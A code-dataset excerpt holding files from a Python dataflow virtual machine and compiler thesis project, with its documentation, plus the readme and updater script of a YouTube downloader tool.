stdout=subprocess.PIPE,stdin=subprocess.PIPE)\n\tres = dvm.communicate(dis)\n\tret = dvm.returncode\n\n\tif ret:\n\t\tlog.error(\"DVM returned non-zero return code %d\", ret)\n\treturn res[0].strip()\n" }, { "alpha_fraction": 0.6802837252616882, "alphanum_fraction": 0.6832465529441833, "avg_line_length": 25.14788818359375, "blob_id": "ae9becc0c952b88a48ca9820fff3c886a340ab97", "content_id": "353def3c0573d11d933c6b27443e3b735a65bc72", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11138, "license_type": "no_license", "max_line_length": 81, "num_lines": 426, "path": "/DVM/core/instruction.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# instructions.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package core.instruction\n# \\brief DVM instruction definitions\n#\n# This module defines the various instruction types.\n# \n# Any instruction has to inherit from the Instruction class\n# and implement it's unimplemented methods. \n# An instruction can take on additional properties by inheriting\n# from any of the extra types.\n##\n\nimport logging\nlog = logging.getLogger(__name__)\n\n# -------------------- #\n# Abstract Instruction #\n# -------------------- #\n\n##\n# General DVM instruction.\n#\n# Defines an interface that all instructions should\n# implement.\n#\n# An instruction is the bread and butter of DVM.\n# it accepts some tokens, and returns some new tokens\n# afterwards.\n##\nclass Instruction(object):\n\tdef __init__(self, chunk = 0):\n\t\tsuper(Instruction, self).__init__()\n\t\tself.chunk = chunk\n\t\tself.key = None\n\n\t## Set the instruction address \n\tdef setKey(self, key):\n\t\tself.key = key\n\n\t## Return a string representation of this instruction.\n\tdef __str__(self):\n\t\tname = self.__class__.__name__\n\t\treturn name + \" \" + \"'\" + str(self.key) + \"'\"\n\t##\n\t# Execute an instruction with a given input\n\t# and a core.\n\t#\n\t# \\param input\n\t#\t\tA token, or a list of tokens, depending\n\t#\t\ton the instruction type.\n\t# \\param core\n\t#\t\tThe core where we execute this\n\t##\n\tdef execute(self, input, core): pass\n\n# ----------- #\n# Extra Types #\n# ----------- #\n\n## Instruction that accepts a literal\nclass Literal(object):\n\t##\n\t# Add a literal to the operation.\n\t# An instruction should never accept only\n\t# literals.\n\t# Not all instructions accept literals.\n\t##\n\tdef addLiteral(self, port, val): pass\n\n## \n# An instruction that inherits from this class\n# promises to send it's output to a destination\n# that can be added through the addDestination method.\n##\nclass Destination(object):\n\n\t##\n\t# Add a destination to this instruction.\n\t#\n\t# \\param port\n\t# \t\tThe output port to link *from*\n\t# \\param toInst\n\t#\t\tThe instruction to send to\n\t# \\param toPort\n\t#\t\tThe port on this instruction to send to.\n\t##\n\tdef addDestination(self, outPort, inst, toPort): pass\n\n\t##\n\t# Send a datum to any destination of a given output port.\n\t#\n\t# \\param datum\n\t#\t\tThe piece of data to send.\n\t# \\param core\n\t#\t\tThe currently active core.\n\t# \\param port\n\t#\t\tThe port that we send outputs from.\n\t# \\param cont\n\t#\t\tThe context of the output.\n\t##\n\tdef sendDatum(self, datum, core, port, cont): pass\n\n##\n# DVM instruction that sends any token it produces\n# to all of the memebers of it's destination list.\n##\nclass DestinationList(Destination):\n\tdef __init__(self):\n\t\tsuper(DestinationList, self).__init__()\n\t\tself.destinations = []\n\n\tdef addDestination(self, _, inst, port):\n\t\tself.destinations.append((inst, port))\n\n\tdef sendDatum(self, datum, core, _, cont):\n\t\tfor dst in self.destinations:\n\t\t\tinst = dst[0]\n\t\t\tport = dst[1]\n\t\t\tcore.tokenizer.simple(\n\t\t\t\tdatum, inst, port, cont)\n\n##\n# DVM instruction that sends output it produces\n# to a destination based on the output port of \n# the output.\n##\nclass DestinationMap(Destination):\n\tdef __init__(self):\n\t\tsuper(DestinationMap, self).__init__()\n\t\tself.destinations = {}\n\n\tdef addDestination(self, port, toInst, toPort):\n\t\tif port in self.destinations:\n\t\t\tself.destinations[port] += [(toInst, toPort)]\n\t\telse:\n\t\t\tself.destinations.update({port : [(toInst, toPort)]})\n\n\tdef sendDatum(self, datum, core, port, cont):\n\t\ttry:\n\t\t\tfor dst in self.destinations[port]:\n\t\t\t\tinst = dst[0]\n\t\t\t\tport = dst[1]\n\t\t\t\tcore.tokenizer.simple(\n\t\t\t\t\tdatum, inst, port, cont)\n\t\texcept KeyError:\n\t\t\tpass\n\n\n# ---------- #\n# Operations #\n# ---------- #\n\n##\n# An operation instruction defines a single operation\n# on all of it's inputs.\n##\nclass OperationInstruction(Instruction, DestinationList, Literal):\n\tdef __init__(self, operation, inputs):\n\t\tsuper(OperationInstruction, self).__init__(chunk = 1)\n\t\tself.totalInputs = inputs\n\t\tself.realInputs = inputs\n\t\tself.operation = operation\n\t\tself.litLst = [None] * inputs\n\n\tdef addLiteral(self, port, val):\n\t\tself.litLst[port] = val\n\t\tself.realInputs -= 1\n\n\t##\n\t# Replace all empty places in the \n\t# argument list by literals, extract\n\t# the datum from tokens and get the context\n\t# from one of the tokens.\n\t##\n\tdef createArgLst(self, args):\n\t\tcont = None\n\n\t\tfor i in xrange(0, len(args)):\n\t\t\tel = args[i]\n\t\t\tif el:\n\t\t\t\tcont = el.tag.cont\n\t\t\t\targs[i] = el.datum\n\t\t\telse: \n\t\t\t\targs[i] = self.litLst[i]\n\n\t\treturn (cont, args)\n\n\tdef execute(self, tokens, core):\n\t\tlog.info(\"executing %s\", self)\n\t\tcont, lst = self.createArgLst(tokens)\n\t\tres = self.operation(*lst)\n\t\tself.sendDatum(res, core, None, cont)\t\t\n\n# -------- # \n# Constant #\n# -------- #\n\n##\n# Constant instruction.\n#\n# A special sink that always sends it's value\n# to it's destinations when it encounters input.\n# This is not really 'nice' according to dataflow \n# semantics but necessary to allow literals that cannot\n# be propagated.\n#\n# The constant instruction will only send it's value\n# when receiving data on port 0. This allows it to\n# only generate a single token when it is placed \n# after a switch statement \n# (which is the only place where it should occur).\n##\nclass Constant(Instruction, DestinationList):\n\tdef __init__(self, value):\n\t\tsuper(Constant, self).__init__()\n\t\tself.value = value\n\n\tdef execute(self, token, core):\n\t\tif token.tag.port == 0:\n\t\t\tself.sendDatum(self.value, core, None, token.tag.cont)\n\n# ----- #\n# Sinks #\n# ----- #\n\n##\n# Sink instruction.\n#\n# A sink is an instruction that only serves\n# to forward any input it receives to it's destinations.\n##\nclass Sink(Instruction, DestinationMap):\n\tdef __init__(self):\n\t\tsuper(Sink, self).__init__()\n\n\tdef execute(self, token, core):\n\t\tport = token.tag.port\n\t\tcont = token.tag.cont\n\t\tdatum = token.datum\n\t\tself.sendDatum(datum, core, port, cont)\n\n# -------------- #\n# Context Change #\n# -------------- #\n\n##\n# Represents a context change in the program.\n# e.g. a function call.\n##\nclass ContextChange(Instruction, Literal):\n\n\t##\n\t# Initialize a context change instruction.\n\t#\n\t# \\param binds\n\t#\t\tThe amount of tokens to bind to a new\n\t#\t\tcontext.\n\t# \\param restores\n\t#\t\tThe amount of tokens the context will\n\t#\t\tproduce before being deleted.\n\t# \\param destSink\n\t#\t\tThe destination of the token after\n\t#\t\tthe context change.\n\t# \\param returnSink\n\t#\t\tThe destination of the tokens \n\t#\t\t**after** their context is restored.\n\t##\n\tdef __init__(self, binds, restores, destSink, returnSink):\n\t\tsuper(ContextChange, self).__init__()\n\t\tself.retnSink = returnSink\n\t\tself.destSink = destSink\n\t\tself.restores = restores\n\t\tself.bindargs = binds\n\t\tself.literals = {}\n\n\tdef addLiteral(self, port, val):\n\t\tself.literals.update({port : val})\n\t\tself.bindargs -= 1\n\n\tdef getLiterals(self):\n\t\treturn self.literals\n\n\tdef execute(self, token, core):\n\t\tlog.info(\"%s, changing context of: %s\", self, token)\n\t\tcore.tokenizer.contexts.bindMany(\n\t\t\ttoken, self, \n\t\t\tself.destSink, self.retnSink, \n\t\t\tself.bindargs, self.restores)\n\n# --------------- #\n# Context Restore #\n# --------------- #\n\n##\n# Represents the restoration of context.\n# e.g. returning from a function.\n##\nclass ContextRestore(Instruction):\n\tdef execute(self, token, core):\n\t\tlog.info(\"%s, restoring: %s\", self, token)\n\t\tcore.tokenizer.contexts.restore(token)\n\n# ------ #\n# Switch #\n# ------ #\n\n##\n# Represents an instruction that will dynamically\n# determine the destination of it's tokens at runtime.\n#\n# The value of the token arriving at port 0 will determine\n# the next goal of the tokens. Tokens that arrive before this\n# token will be stored until their destination is resolved.\n#\n# This value should be an index corresponding to an entry in\n# the dstLst of the instruction. This entry is the destination of\n# the tokens that this instruction receives (for this context).\n##\nclass Switch(Instruction):\n\n\tdef __init__(self, dstLst):\n\t\tsuper(Switch, self).__init__()\n\t\tself.dstLst = dstLst\n\n\tdef getDst(self, token):\n\t\ttry:\n\t\t\treturn self.dstLst[token.datum]\n\t\texcept IndexError:\n\t\t\tlog.info(\"%s: Invalid switch destination idx: %s, using 0\", self, token.datum)\n\t\t\treturn self.dstLst[0]\n\n\tdef execute(self, token, core):\n\t\tport = token.tag.port\n\n\t\tif port == 0:\n\t\t\tcnt = token.tag.cont\n\t\t\tdst = self.getDst(token)\n\t\t\tlog.info(\"%s, switching to destination %s, for context %s\", self, dst, cnt)\n\t\t\tcore.tokenizer.switcher.set(self, cnt, dst)\n\t\tcore.tokenizer.switcher.switch(token, self)\n\n# ----- #\n# Split #\n# ----- #\n\n##\n# Split instruction.\n#\n# This receives at least one input, \n# which should be a compound data type.\n# The argument sent to port 0 should be a compound data type.\n#\n# Upon executing, the element at port 0 will be 'split',\n# all of it's elements will be sent to port 0 of the destSink,\n# with a new context. All of the other arguments will also be sent to the sink.\n#\n# Upon reaching a context restore, the resulting tokens will each receive a port\n# matching their index in the split array.\n##\nclass Split(Instruction):\n\t\n\tdef __init__(self, binds, dest, merge):\n\t\tsuper(Split, self).__init__(chunk = 1)\n\t\tself.totalInputs = binds\n\t\tself.realInputs = binds\n\t\tself.merge = merge\n\t\tself.dest = dest\n\n\tdef execute(self, tokens, core):\n\t\tlog.info(\"%s, splitting compound: %s\", self, tokens)\n\t\tcont = tokens[0].tag.cont\n\t\tcomp = tokens[0].datum\n\t\targs = tokens[1:]\n\t\tleng = len(comp)\n\n\t\tcore.matcher.setKey(self.merge, cont, leng)\n\n\t\t# Split the compound and send it's elements\n\t\t# and the args to the destSink\n\t\tfor idx in xrange(0, leng):\n\t\t\telm = comp[idx]\n\t\t\tnewCont, newCore = core.tokenizer.contexts.bind(self.merge, idx, cont, 1)\n\t\t\tcore.tokenizer.simple(elm, self.dest, 0, newCont, newCore)\n\t\t\t\n\t\t\tfor arg in args:\n\t\t\t\tcore.tokenizer.simple(arg.datum, self.dest, arg.tag.port, newCont, newCore)\n\n# ---------------- #\n# Stop Instruction #\n# ---------------- #\n\n##\n# Represents the end of the program.\n# Any input of this instruction is considered to be\n# the result of the program.\n##\nclass StopInstruction(Instruction):\n\tdef execute(self, token, core):\n\t\tlog.info(\"%s reached stop instruction: %s\", token, self)\n\t\tcore.tokenizer.stopToken(token)" }, { "alpha_fraction": 0.759604811668396, "alphanum_fraction": 0.7644346952438354, "avg_line_length": 65.01449584960938, "blob_id": "e8f74cea5ca871fc9cc02523c7869964ebfac379", "content_id": "8918fa5c1926f73e72a30f758a31461b14f4193b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4555, "license_type": "no_license", "max_line_length": 725, "num_lines": 69, "path": "/doc/main.md", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "<!-- Written by Mathijs Saey at the VUB, all rights reserved -->\n\n[TOC]\n\n# Introduction {#Introduction}\n\nThis is the main documentation of the [dataflow software stack](https://github.com/mathsaey/Dataflow-Software-Stack), created by Mathijs Saey for his thesis at the VUB. \n\nThese pages serve a number of purposes:\n* [Provide a basic overview about the dataflow software stack.](#About)\n* [Provide a high-level overview of the code base.](#Structure)\n* [Collect the available documentation on the code base](files.html)\n* [Collect all the necessary information to get the software stack up and running](#Start)\n* [Collect references and examples that can come in handy while working on DVM.](pages.html)\n\n# About the Software Stack {#About}\n\nThe main goal of the dataflow software stack was to experiment with a prototypical implementation of a dataflow virtual machine and a compiler that generates input for such a machine. As the name implies, this machine utilizes the the [dataflow architecture](http://en.wikipedia.org/wiki/Dataflow_architecture) to achieve a high amount of parallelism. Concretely, our compiler accepts IF1, which it transforms into [DIS](md_doc__d_i_s.html), a low-level dataflow language. Afterwards, this DIS program can be utilized by DVM to execute our program. Utilizing DIS instead of a more traditional low-level language such as x86 allows us to keep track of the data dependencies in the program on every level of the software stack.\n\n## Dataflow {#Dataflow}\n<img style=\"float: right\" src=\"simpleStatic.png\"/>\n\nIn short, the general idea behind [dataflow](http://en.wikipedia.org/wiki/Dataflow_architecture) is that an instruction in the program is executed once it's inputs are ready. This property allows us to exploit the implicit parallelism of programs. A dataflow program can be represented as a graph, in such a graph, nodes represent operations while edges represent data dependencies between these operations.\n\nA visual representation of such a dataflow graph can be seen right of this section. This graph was generated from the following Sisal code.\n\n~~~\nfunction main(a, b, c, d : integer returns integer)\n\tlet \n\t\tab := a + b;\n\t\tcd := c + d\n\tin \n\t\tab + cd \n\tend let\nend function\n~~~\n\nAs we can see, this program simply takes 4 inputs, and adds all of these together. The generated dataflow graph shows us that both of the additions could be carried out in parallel.\n\n## Sisal and IF1 {#IF1}\n\n[Sisal](http://en.wikipedia.org/wiki/SISAL) is a language designed to be a high level variant for languages such as PASCAL that can work on multicore machines. During the first compilation phase sisalc (the sisal compiler) compiles Sisal to IF1, an intermediate language, which represents the sisal source code as a dataflow graph. \n\nOur research is focused on the compilation and execution of a dataflow program, and not on the design of a dataflow language. For this reason, we decided to use IF1 as the primary input language of our software stack. Incorporating [sisalc](http://sourceforge.net/projects/sisal/) offers us a high-level language for writing dataflow programs, along with a compiler that removes the complexity of the language for us.\n\nMore information about IF1 along with some sisal and IF1 code samples can be found in the [IF1 overview](md_doc__i_f1.html). \n\n# Getting started {#Start}\n\nRunning DVM and DISc is quite trivial at the moment. All you need is a working [python](http://www.python.org/) interpreter. Man pages for DVM and DISc can be found in the [resources folder of the repository](https://github.com/mathsaey/Dataflow-Software-Stack/tree/master/res).\n\nYou need to install [sisalc](http://sourceforge.net/projects/sisal/), the sisal C compiler if you want to produce your own IF1 files from sisal source code.\n\nThe sites of all these tools and the used versions can be found below:\n\nTool | Version | Website\n---------|---------|--------\n`sisalc` | 14.1.0 | http://sourceforge.net/projects/sisal/\n`python` | 2.7.6 | http://www.python.org/\n\n# Overall Structure {#Structure}\n\nOur stack is split into 2 components.\n\n* DVM, the actual execution engine. Which accepts [DIS](md_doc__d_i_s.html) as input.\n* DISc, A DIS Compiler built on IGR. This is based on 3 foundations:\n\t* IGR, the Intermediate Graph Representation, a flexible, graph-based representation that is the foundation of our compiler.\n\t* An easily extensible set of front-ends that parse a source language and turn it into IGR.\n\t* An extensible set of back-ends that apply a few transformations to IGR, before mapping it to DIS.\n" }, { "alpha_fraction": 0.7941176295280457, "alphanum_fraction": 0.797537624835968, "avg_line_length": 90.4375, "blob_id": "6492b4301fa039a49c3c1c093e1861aa69affb0d", "content_id": "c04c8ea860d3aab6745b2cdc705d18a37098ad93", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1462, "license_type": "no_license", "max_line_length": 424, "num_lines": 16, "path": "/README.md", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# About\n\nThis is the repository of the master's thesis of Mathijs Saey at the Vrije Universiteit Brussel. The goal of this thesis was the creation of a dataflow software stack on modern hardware. Concretely, this repo contains a prototypical Dataflow Virtual Machine (DVM), alongside a compiler (DISc), which can transform a subset of (Sisal/IF1) programs into valid DVM programs. \n\n## [Dataflow](http://en.wikipedia.org/wiki/Dataflow_architecture)\n\nThe dataflow architecture is a computer architecture which differs from the more traditional von Neumann architecture. \nThe idea behind dataflow is that instructions are executed when all of the data they depend on is available.\n\n## IF1 and [Sisal](http://en.wikipedia.org/wiki/SISAL)\n\nSisal (Streams and Iteration in a Single Assignment Language) is an implicitly parallel language designed to be a high level variant for languages such as PASCAL that can work on multicore machines. During the first compilation phase sisalc (the sisal compiler) compiles Sisal to IF1, an intermediate language, which represents the sisal source code as a dataflow graph. We can utilize IF1 as an input to our software stack.\n\n# Getting Started.\n\nIf you are interested in working with or using DVM or DISc, you should look at the [documentation](http://mathsaey.github.io/Dataflow-Software-Stack/index.html). It contains the complete DVM and DISc documentation, a detailed IF1 overview and a guide to get DVM and DISc up and running." }, { "alpha_fraction": 0.7042175531387329, "alphanum_fraction": 0.7164261937141418, "avg_line_length": 29.049999237060547, "blob_id": "b1fb0517ac15fb5767b0259c83c724f0f6c7b9cc", "content_id": "14bac2c6b2c19a29cf3c657a270436e4f90c1731", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1802, "license_type": "no_license", "max_line_length": 79, "num_lines": 60, "path": "/DISc/frontEnd/IF1/compound.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# operations.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package frontEnd.IF1.compound\n# \\brief Compound node reference\n# \n# This module maps the IF1 compound nodes to \n# their IGR counterparts.\n##\n\nimport logging\nlog = logging.getLogger(__name__)\n\n## Various IGR compound nodes.\n__COMPOUNDS__ = {\n\t0 : 'forall',\n\t1 : 'select',\n\t2 : 'tagCase',\n\t3 : 'LoopA',\n\t4 : 'loopB',\n\t5 : 'ifThenElse',\n\t6 : 'iterate',\n\t7 : 'while',\n\t8 : 'repeat',\n\t9 : 'seqForAll',\n\t10 : 'uReduce'\n}\n\ndef getCompound(label, ctr = \"?\"):\n\tkey = int(label)\n\ttry:\n\t\tconstructor = __COMPOUNDS__[key]\n\texcept KeyError:\n\t\tlog.error(\"Line %d: Cannot find compound node with label: %s\", ctr, label)\n\telse: \n\t\treturn constructor" }, { "alpha_fraction": 0.6831232309341431, "alphanum_fraction": 0.6860994100570679, "avg_line_length": 24.734233856201172, "blob_id": "462a0b0c77ef6662ef833614ddb5c5c82795373c", "content_id": "10cb8edbe119561f56e7921b6a9d4ebd8031a698", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5712, "license_type": "no_license", "max_line_length": 89, "num_lines": 222, "path": "/DVM/core/runtime.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# runtime.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package core.runtime\n# \\brief DVM runtime core\n# \n# This module defines the runtime. \n# The runtime is responsible for dispatching tokens,\n# matching tokens by their contexts and for scheduling\n# instructions that are ready to execute.\n#\n# Multiple runtime \"cores\" are active at any given time, depending\n# on the system. It is the responsibility of the runtime to find a\n# decent load balance accross these cores.\n##\n\nimport token\nimport random\nimport memory\nimport multiprocessing\n\nfrom context import ContextCreator\nfrom scheduler import Scheduler\nfrom dispatcher import TokenDispatcher\nfrom tokenizer import Tokenizer\nfrom contextMatcher import ContextMatcher\n\nimport logging\nlog = logging.getLogger(__name__)\n\n# ------------- #\n# Runtime Class #\n# ------------- #\n\n##\n# Runtime core.\n#\n# A runtime core is a worker unit in DVM.\n# It defines it's own scheduler, matcher and\n# token dispatcher and it has a static copy of the\n# instruction memory.\n##\nclass Core(object):\n\t##\n\t# Initialize a core.\n\t#\n\t# This method only initializes all the components of the\n\t# core that are not dependent on multiprocessing elements.\n\t#\n\t# \\param identifier\n\t#\t\tThe identifier of this core, this identifier should be unique \n\t#\t\tand it should match the identifier of this core in the collection\n\t#\t\tof all the cores.\n\t# \\param memory\n\t#\t\tA reference to the static instruction memory.\n\t##\n\tdef __init__(self, identifier, memory):\n\t\tsuper(Core, self).__init__()\n\t\tlog.info(\"Initializing core: %d\", identifier)\n\n\t\t## Instruction memory\n\t\tself.memory = memory\n\t\t## Identifier of this core. (integer)\n\t\tself.identifier = identifier\n\t\t## See if this core is running.\n\t\tself.active = True\n\t\t## Message Queues of the other cores\n\t\tself.cores = None\n\t\t## Highest index of the core array\n\t\tself.maxIdx = None\n\n\t\t## Message Queue of this core\n\t\tself.inbox = multiprocessing.Queue()\n\t\t## Context creator for this core\n\t\tself.contextCreator = ContextCreator(self)\n\t\t## Tokenizer for this core\n\t\tself.tokenizer = Tokenizer(self)\n\t\t## Token dispatcher for this core\n\t\tself.dispatcher = TokenDispatcher(self)\n\t\t## Scheduler for this core\n\t\tself.scheduler = Scheduler(self)\n\t\t## Context matcher for this core\n\t\tself.matcher = ContextMatcher(self)\n\n\t## String representation of a core.\n\tdef __str__(self):\n\t\treturn \"Core: \" + str(self.identifier)\n\n\t## See if 2 cores are equal\n\tdef __eq__(self, other):\n\t\treturn self.identifier == other.identifier\n\n\t##\n\t# Add a token to the inbox of a core.\n\t#\n\t# \\param token\n\t#\t\tThe token to add.\n\t# \\param core\n\t#\t\tThe core to add the token to.\n\t#\t\tThe current core will be used if \n\t#\t\tthis argument is not added.\n\t#\n\tdef add(self, token, core = None):\n\t\tif core != None:\n\t\t\tself.cores[core].put(token)\n\t\telse: \n\t\t\tself.inbox.put(token)\n\n\t##\n\t# Add a token to all the\n\t# other cores.\n\t##\n\tdef addToAll(self, token): \n\t\tfor core in self.cores:\n\t\t\tcore.put(token)\n\n\t## \n\t# Find the core under the lowest load. \n\n\t##\n\tdef getCore(self):\n\t\ttry:\n\t\t\tidx, _ = min([tup for tup in enumerate(self.cores)], key = lambda (idx, q): q.qsize())\n\t\t\treturn idx\n\t\texcept NotImplementedError:\n\t\t\treturn random.randint(0, len(self.cores) - 1)\n\n\t##\n\t# Add a reference to the message\n\t# queues of the other cores.\n\t##\n\tdef link(self, cores):\n\t\tself.maxIdx = len(cores) - 1\n\t\tself.cores = cores\n\n\t## \n\t# Start the runtime\n\t##\n\tdef start(self):\n\t\tlog.info(\"Core %s starting run loop\", self)\n\t\twhile self.active:\n\t\t\tt = self.inbox.get()\n\t\t\tself.dispatcher.process(t)\n\n\t##\n\t# Stop the current core.\n\t##\n\tdef stop(self):\n\t\tlog.info(\"Core %s terminated\", self)\n\t\tself.active = False\n\n\t##\n\t# Return a value to the user.\n\t#\n\t# \\param value\n\t#\t\tThe value to return\n\t#\t\tto the user.\n\t##\n\tdef returnValue(self, value):\n\t\tprint value\n\n__cores__ = []\n__port__ = 0\n__triv__ = None\n__in__ = None\n\ndef start(cores):\n\tif __triv__:\n\t\tlog.info(\"Aborting and returning trivial data...\")\n\t\tprint __triv__\n\t\treturn\n\n\tcoreLst = [Core(i, memory.memory()) for i in xrange(0, cores)]\n\tqueues = [coreLst[i].inbox for i in xrange(0, cores)]\n\n\tfor core in coreLst:\n\t\tcore.link(queues)\n\n\t\tp = multiprocessing.Process(\n\t\t\ttarget = core.start, \n\t\t\tname = \"C \" + str(core.identifier))\n\t\tp.start()\n\t\n\tglobal __cores__\n\t__cores__ = coreLst\n\ndef addData(datum): \n\tglobal __port__\n\ttag = token.ExternalTag(__port__)\n\ttok = token.Token(datum, tag)\n\t__cores__[0].add(tok)\n\t__port__ += 1\n\tlog.info(\"Adding data to runtime: %s\", tok)\n\ndef addTrivial(datum):\n\tglobal __triv__\n\t__triv__ = datum\n\tlog.info(\"Added trivial data to runtime\")" } ]
45
elaa0505/PyTubeDown
https://github.com/elaa0505/PyTubeDown
361aa44652a85f31b7c01c780526883780cde551
8575482b80d41c03144295c27963bcbdcae3be76
782e16ad60acb0aa01ee1906d64f0a9da964077c
refs/heads/master
2020-05-31T08:14:39.664765
2019-06-04T10:29:02
2019-06-04T10:29:02
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6763990521430969, "alphanum_fraction": 0.6885644793510437, "avg_line_length": 22.711538314819336, "blob_id": "d2587035bd8a5e60acf27b4aaaae251fd9a39aea", "content_id": "e1488c7cb7cc26bd06cd2493ea2ba598c6c5fb83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1233, "license_type": "no_license", "max_line_length": 107, "num_lines": 52, "path": "/readme.md", "repo_name": "elaa0505/PyTubeDown", "src_encoding": "UTF-8", "text": "<h1 align=\"center\">\n\t<br>\n\t<img src=\"https://raw.githubusercontent.com/ProHackTech/PyTubeDown/master/logo.png\" alt=\"PyTubeDown Logo\">\n\t<br>\n\tPyTubeDown\n</h1>\n\n<h3 align=\"center\">\n\tDownload YouTube videos & playlists using Python\n</h3>\n\n## Features\n- [+] Multithreaded downloads\n- [+] Download playlist\n- [+] Download using video URL\n- [+] Download using one keyword\n- [+] Download using multiple keywords\n\n## Requirements\n\n### System\n- Tested on Windows\n- Python 3\n- Selenium - Firefox gecko driver\n\n## Usage\n\n### Help Menu\n`python3 down.py -h` or `python3 down.py --help`\n\n### Commands\n\n- **-t/--topic** = Download videos using query/topic\n- **-scrl/--scroll** = Page scroll height for loading more videos\n- **-upd/--update** = Update the script\n- **-pl/--playlist** = Download playlist\n- **-l/--link** = Download single video\n\n### Examples\n\n**Single video download**: `down.py -l \"Video Url Here\"`\n\n**One Query/Word**: `down.py -t singleWord -scrl 2000`\n\n**Multiple Search Query/Words**: `down.py -t \"Multiple Words Here\" -scrl 2000`\n\n**Playlist Download**: `down.py -pl \"Playlist Link Here\"`\n\n**Update script**: `down.py -upd`\n\n## Contributions\nAny code improvements, suggestions, issues and feature improvements are appreciated!\n" }, { "alpha_fraction": 0.7163323760032654, "alphanum_fraction": 0.719197690486908, "avg_line_length": 22.299999237060547, "blob_id": "d19cc69c30f98b14dbfb1c3332111cffdefe2811", "content_id": "aef9955f8497c246a17570209b7d3027091ad00a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 698, "license_type": "no_license", "max_line_length": 112, "num_lines": 30, "path": "/updater/update.py", "repo_name": "elaa0505/PyTubeDown", "src_encoding": "UTF-8", "text": "import urllib.request,os\nfrom sys import exit\nfrom shutil import copyfile\n\n# update directories\ndef update_dir(src):\n\tdst = \"../\" + src\n\tcopyfile(src, dst)\n\tos.remove(src)\n\tprint(f\"updated {src}\")\n\n# download files\ndef download_file(url,name):\n\ttry:\n\t\turllib.request.urlretrieve(url, name)\n\texcept:\n\t\tprint(f\"Error downloading: {url}\")\n\tupdate_dir(name)\n\n# get the file list\ntry:\n\turllib.request.urlretrieve(\"https://raw.githubusercontent.com/ProHackTech/pytubedown/master/updater/files.txt\")\nexcept:\n\tprint(f\"Error downloading: {url}\")\n\n# read file list\nlines = open('files.txt').readlines()\nlineArray = 